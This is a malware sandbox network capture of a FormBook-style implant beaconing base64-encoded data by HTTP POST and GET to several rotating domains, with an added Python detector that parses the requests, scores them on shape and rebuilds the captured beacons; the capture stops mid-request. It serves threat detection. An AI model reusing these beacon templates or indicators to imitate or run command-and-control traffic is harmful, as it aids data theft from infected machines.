                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j"}</script></head></html>
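
The sessions above are one process (PID 5188) cycling through three hosts with an identical request shape: a POST to a four-character directory carrying a single form field named A60d whose value is base64, sent with 205-, 225- and 1241-byte bodies, then a GET with the same A60d key plus QftlZ=CnaPg8j, all with a fixed Chrome/33 User-Agent and Origin/Referer headers built from the Host header. None of the hosts answers as a live C2 in this capture (astorg-group.info is a Gandi parking page that returns 501 to the POST, fiqsth.vip answers the GET with a JavaScript redirect to /lander), so a detection keyed on the domain names would miss the implant. The Python below is an added example, not part of the Joe Sandbox report: it parses raw HTTP/1.1 requests, scores each on that shape, and correlates the beacon parameter name across hosts. The sample requests rebuild the captured header set with the bodies and query strings shown above; the benign request and the host app.example.test are constructed, and the indicator names are my own.

```python
"""Shape-based detector for the FormBook-style beacons in the capture above (added example,
not part of the Joe Sandbox report). Requests are scored on shape, not on domain, since the
implant rotates hosts; the beacon parameter name is then correlated across hosts."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # alphabet of the A60d=... values
KEY_RE = re.compile(r"^[A-Za-z0-9]{4}$")         # 4-char parameter name (A60d)
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")         # /vdvc/, /0m8a/, /ezyn/
UA_RE = re.compile(r"Chrome/33\.0\.1726\.0 Safari/537\.36$")   # hard-coded, obsolete UA
UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/33.0.1726.0 Safari/537.36")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}

def split_form(data):
    """Split key=value&... without percent-decoding, so '+' and '/' in base64 survive."""
    return [tuple(item.partition("=")[::2]) for item in data.split("&") if item]

def beacon_params(req):
    """Form pairs if the request has the one-key POST / two-key GET base64 shape, else None."""
    if req["method"] == "POST":
        pairs, expected = split_form(req["body"]), 1
    elif req["method"] == "GET":
        pairs, expected = split_form(urlsplit(req["target"]).query), 2
    else:
        return None
    if len(pairs) != expected:
        return None
    key, value = pairs[0]
    return pairs if KEY_RE.match(key) and len(value) >= 64 and B64_RE.match(value) else None

def score_request(req):
    """Names of the indicators this request matches (indicator names are my own)."""
    hits, h = [], req["headers"]
    host, path = h.get("host", ""), urlsplit(req["target"]).path
    if PATH_RE.match(path):
        hits.append("four-char-directory")
    if beacon_params(req) is not None:
        hits.append("single-base64-param")
    if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
        hits.append("self-referencing-origin-referer")   # browser headers derived from Host
    if h.get("cache-control") == "max-age=0" and h.get("connection") == "close":
        hits.append("max-age-0-and-close")
    if UA_RE.search(h.get("user-agent", "")):
        hits.append("stale-chrome-33-ua")
    return hits

def analyse(raw_requests, threshold=3):
    """Score each request and map every beacon key to the hosts it was sent to.
    Returns ([(host, method, hits)], {key: [hosts]}); one key on many hosts = one implant."""
    per_request, by_key = [], defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        hits, pairs = score_request(req), beacon_params(req)
        per_request.append((req["headers"].get("host", ""), req["method"], hits))
        if len(hits) >= threshold and pairs:
            by_key[pairs[0][0]].add(req["headers"].get("host", ""))
    return per_request, {k: sorted(v) for k, v in by_key.items()}

def beacon_post(host, path, body):
    """Rebuild a captured POST with the exact header set seen in the capture."""
    return (f"POST {path} HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
            f"Accept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\nCache-Control: max-age=0\r\nConnection: close\r\n"
            f"Host: {host}\r\nOrigin: http://{host}\r\nReferer: http://{host}{path}\r\n"
            f"User-Agent: {UA}\r\n\r\n{body}")

def beacon_get(host, target):
    """Rebuild a captured GET (these carry no Cache-Control, Origin or Referer)."""
    return (f"GET {target} HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\n"
            f"Connection: close\r\nHost: {host}\r\nUser-Agent: {UA}\r\n\r\n")

# Bodies and query strings copied from the requests in the capture above.
SAMPLES = [
    beacon_post("www.astorg-group.info", "/vdvc/", "A60d=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyleyasdxdbESuPvh0LsEDUoYuv9tQx6e0kKn2dd"),
    beacon_post("www.fiqsth.vip", "/0m8a/", "A60d=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYwhYs4524V4G3Kcq7CZXBIF9wo00Kknm0ThbXQQ="),
    beacon_post("www.bio-thymus.com", "/ezyn/", "A60d=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99ujD5YfoP9z/zJkXhUj7ypPmAkLVsAcSV+Wding="),
    beacon_get("www.astorg-group.info", "/vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j"),
    beacon_get("www.fiqsth.vip", "/0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j"),
]
# Constructed benign form post; app.example.test is a placeholder host.
BENIGN = ("POST /search HTTP/1.1\r\nHost: app.example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n"
          "Content-Length: 16\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
          "q=sandbox&page=2")

if __name__ == "__main__":
    per_request, keys = analyse(SAMPLES + [BENIGN])
    for host, method, hits in per_request:
        print(f"{method:4} {host:22} {len(hits)} indicator(s): {', '.join(hits) or '-'}")
    print("beacon key -> hosts:", keys)
```

Running it prints one line per request with its indicator list and then the key-to-hosts map, which shows A60d going to all three hosts from the same process. The threshold of three lets the sparser GETs through (they carry no Cache-Control, Origin or Referer) while the constructed benign post scores zero. The parameter name and directory are per-sample values, so the shape tests, not the literal A60d, carry the detection; the key is only the correlation handle once a request has been flagged.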


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         33 | 192.168.2.8 | 49741 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:43.496015072 CET | 639 | OUT | POST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 75 6a 44 35 59 66 6f 50 39 7a 2f 7a 4a 6b 58 68 55 6a 37 79 70 50 6d 41 6b 4c 56 73 41 63 53 56 2b 57 64 69 6e 67 3d
                                                                                        Data Ascii: A60d=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99ujD5YfoP9z/zJkXhUj7ypPmAkLVsAcSV+Wding=


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         34 | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:46.035428047 CET | 659 | OUT | POST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6e 4e 41 6e 6a 6a 70 33 42 36 50 64 47 74 38 77 30 76 70 50 4f 45 36 57 44 72 52 49 4e 54 72 2b 51 63 6b 43 5a 36
                                                                                        Data Ascii: A60d=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpnNAnjjp3B6PdGt8w0vpPOE6WDrRINTr+QckCZ6


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        35 | 192.168.2.8 | 49743 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:49.319799900 CET | 1676 | OUT | POST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 2f 34 33 34 73 44 2b 45 2b 6a 6c 2b 66 49 62 45 75 46 77 6b 4e 4f 48 76 65 56 32 67 67 6f 6d 2f 43 79 30 52 75 6c 62 61 6c 63 2b 4c 59 38 31 31 6f 78 68 32 54 63 4e 2f 56 31 4a 49 4a 38 49 4d 79 45 68 6a 7a 36 75 68 72 68 31 36 6e 55 50 2b 68 38 75 45 38 2f 4e 69 53 32 64 59 30 35 52 44 51 57 58 56 69 4d 71 52 72 5a 77 36 64 45 30 6a 67 6b 46 56 48 78 4e 42 38 73 6f 52 4b 6f 57 58 73 58 35 6e 44 43 63 34 74 63 62 4b 6d 6a 34 77 52 7a 66 75 6c 4d 37 32 78 4f 59 70 76 71 57 78 37 79 69 [TRUNCATED]
                                                                                        Data Ascii: A60d=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAe/434sD+E+jl+fIbEuFwkNOHveV2ggom/Cy0Rulbalc+LY811oxh2TcN/V1JIJ8IMyEhjz6uhrh16nUP+h8uE8/NiS2dY05RDQWXViMqRrZw6dE0jgkFVHxNB8soRKoWXsX5nDCc4tcbKmj4wRzfulM72xOYpvqWx7yiz/7beDIPtKH1rjXmZWF9zcpkmxl5sGZbRwv0bjyFkbMGnVxzyCq9qql60Qwh7W4rV5p5ngszZzBFXxz5DDVzl+dEnZ+tyn/ItG6CoNmmZsMYvYsFNerWFqC8oBeEN/ekwS/WBEv11bdMmUaQWZtrUmv1W964OygPy90quCoBVe6Ud6+nj6FduBlfvoYpMm4JppDBKT6draHzi91ReEPqmwKr1DPIwpAKFxUOeNOI8Cb/hCaE71StrHmJC3u8lsPLRMU+1HSmiyPDarOaH5heawqRXZ3hKHHgV8BNzglylrnN2LUc+ENRsXWIpcRTFscP4E+Ugenb/8ua+3roYYkWzJaUZEbQ5QzMo1ID9/UJ+PFUWGpxagx8/ZtHjZtcf1cozZZKL6hHhQkFqHLMf7NvS2pbPjAB2B9R506AxtF31n4ZBVgPATU5gl0kMW2o5fYcODuFuw1ZCpEK16TQwA5HPtpmIKiLP9UtPdIgYd+/cAl8l4ns9jPqjVwEHgc8+4mHdip0bSJiUCjV1KG7Vy4qVuOl9BZL57M+nczf0HShDJl1mMBTs8DukMeHoNvUsYIU84Iw4Gs+etHxxvYItA+IzLW/L51E2LoSRRD7H5zS4OP6c6mTwn4K2ceT2S7v8xyt+SLP5MXWOtbu0w1e4WrS0QIEQ7M+Or88uh [TRUNCATED]


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        36 | 192.168.2.8 | 49744 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:51.922350883 CET | 380 | OUT | GET /ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:52.473377943 CET | 406 | IN | HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:01:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4c 4f 38 2f 42 57 45 62 34 4d 30 66 56 4c 33 4a 79 37 35 2b 63 32 59 48 48 6d 6a 30 5a 71 64 6e 62 68 51 78 43 77 67 78 66 54 48 79 33 41 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j"}</script></head></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        37 | 192.168.2.8 | 49745 | 47.52.221.8 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:58.266865969 CET | 639 | OUT | POST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 53 4a 73 2f 75 71 77 36 72 4f 5a 63 64 50 4e 43 31 4f 6a 74 6a 41 5a 4f 32 54 34 74 42 31 2b 75 31 53 52 65 61 38 3d
                                                                                        Data Ascii: A60d=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVSJs/uqw6rOZcdPNC1OjtjAZO2T4tB1+u1SRea8=
                                                                                        Nov 6, 2024 16:01:59.256027937 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:59 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        38 | 192.168.2.8 | 49746 | 47.52.221.8 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:02:00.846220970 CET | 659 | OUT | POST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 6f 79 4f 31 37 4f 6f 32 6f 57 30 57 43 68 41 4e 6f 7a 79 4c 6e 73 31 2f 6b 42 76 72 7a 51 32 47 74 30 41 43 4a 4b
                                                                                        Data Ascii: A60d=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujoyO17Oo2oW0WChANozyLns1/kBvrzQ2Gt0ACJK
                                                                                        Nov 6, 2024 16:02:01.816914082 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:01 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        39 | 192.168.2.8 | 49747 | 47.52.221.8 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:02:03.392417908 CET | 1676 | OUT | POST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
